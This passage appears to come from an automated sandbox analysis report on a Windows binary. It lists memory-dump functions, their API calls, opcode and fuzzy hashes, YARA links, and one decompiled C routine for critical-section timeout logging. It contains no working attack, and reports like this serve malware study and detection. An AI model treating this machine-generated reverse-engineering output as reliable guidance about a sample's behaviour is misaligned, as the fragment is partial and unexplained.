                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction Fuzzy Hash: 58E012B1200218ABDB14EF99DC41EA777ADAF88750F118558BA085B282CA30F9148AF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00628620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0061CF92,0061CF92,?,00000000,?,?), ref: 00628650
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction ID: 4809eb8b23fe7a39c6137054a0d10668bf46143b8e002749ff1261c3134e926a
                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction Fuzzy Hash: B3E01AB12002186BDB10DF49DC85EE737ADAF88750F018554BA0857241C930E8148BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0061D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00617C63,?), ref: 0061D42B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                            • Instruction ID: b7cb0c214701455e63daacca854b85b3d0da7853f40521cb37d6c5076ec2a44c
                                                                            • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                            • Instruction Fuzzy Hash: 19D0A7717903043BE610FAA8AC03F6632CE9B44B04F494064F988D73C3DA64F5004565
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0464967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2283edae011e033a5d2807ed068e0d8d111ca24eedc0fd525b8b183dcdbd9e1c
                                                                            • Instruction ID: f1663a01ee27faf67ca5d9dccfda07e86f19c6f4371ee49c321067a3c1fc0227
                                                                            • Opcode Fuzzy Hash: 2283edae011e033a5d2807ed068e0d8d111ca24eedc0fd525b8b183dcdbd9e1c
                                                                            • Instruction Fuzzy Hash: 45B02BF19420C1C6FB01DB7006087173900B7D0300F12C011D1020241A0338D0C0F1B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0469FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E0469FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0464CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04695720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04695720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                            0x0469fdda
                                                                            0x0469fde2
                                                                            0x0469fde5
                                                                            0x0469fdec
                                                                            0x0469fdfa
                                                                            0x0469fdff
                                                                            0x0469fe0a
                                                                            0x0469fe0f
                                                                            0x0469fe17
                                                                            0x0469fe1e
                                                                            0x0469fe19
                                                                            0x0469fe19
                                                                            0x0469fe19
                                                                            0x0469fe20
                                                                            0x0469fe21
                                                                            0x0469fe22
                                                                            0x0469fe25
                                                                            0x0469fe40

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469FDFA
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0469FE2B
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0469FE01
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: 6ff148161b634d82ea87d09b9308b3538aa84cabd0b295fec58a701324ddd139
                                                                            • Instruction ID: 7280948127e90eb35be6e3daff5e1122b48358612c33ce7341ff6e9fa6833c90
                                                                            • Opcode Fuzzy Hash: 6ff148161b634d82ea87d09b9308b3538aa84cabd0b295fec58a701324ddd139
                                                                            • Instruction Fuzzy Hash: 33F0C272240201BBEA251A45DC06E23BB9EEB44730F150218F6289A1D1FAA2BD2196A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%